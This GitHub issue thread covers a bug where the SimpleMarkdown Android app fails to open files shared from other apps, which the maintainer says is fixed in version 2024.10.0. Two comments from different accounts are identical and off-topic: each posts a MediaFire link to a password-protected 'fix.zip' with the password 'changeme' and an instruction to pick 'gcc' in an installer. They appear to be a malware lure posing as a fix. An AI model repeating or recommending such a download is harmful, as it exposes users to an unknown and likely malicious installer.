### ISSUE TITLE
Does not open files from third-party apps

### ISSUE THREAD

**Issue by seamus-45** [wbrawner/SimpleMarkdown#90]
Since last massive refactor update, SimpleMarkdown does not open files from apps like Telegram (via "open with app" dialog) It just shows a Untitled.md document.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by wbrawner** [comment]
Thanks for reporting this! I'll take a look as soon as I get the chance

**Comment by clach04** [comment]
I'm seeing the same thing with version 1.0.2. With cx file explorer https://play.google.com/store/apps/details?id=com.cxinventor.file.explorer

**Comment by Lafred** [comment]
I've seen this issue as well.  It will not open files that are not on the file system.

**Comment by mmwelt** [comment]
This is a major problem for me too. Luckily it's possible to install the older version in F-Droid.

**Comment by wbrawner** [comment]
Sorry for the delay, it's been a busy fall for me so far, but I've got a fix ready that'll be going out in the next release, hopefully sometime later this week.

**Comment by wbrawner** [comment]
This should be fixed in 2024.10.0, available now on the Play Store and (hopefully soon on) F-Droid
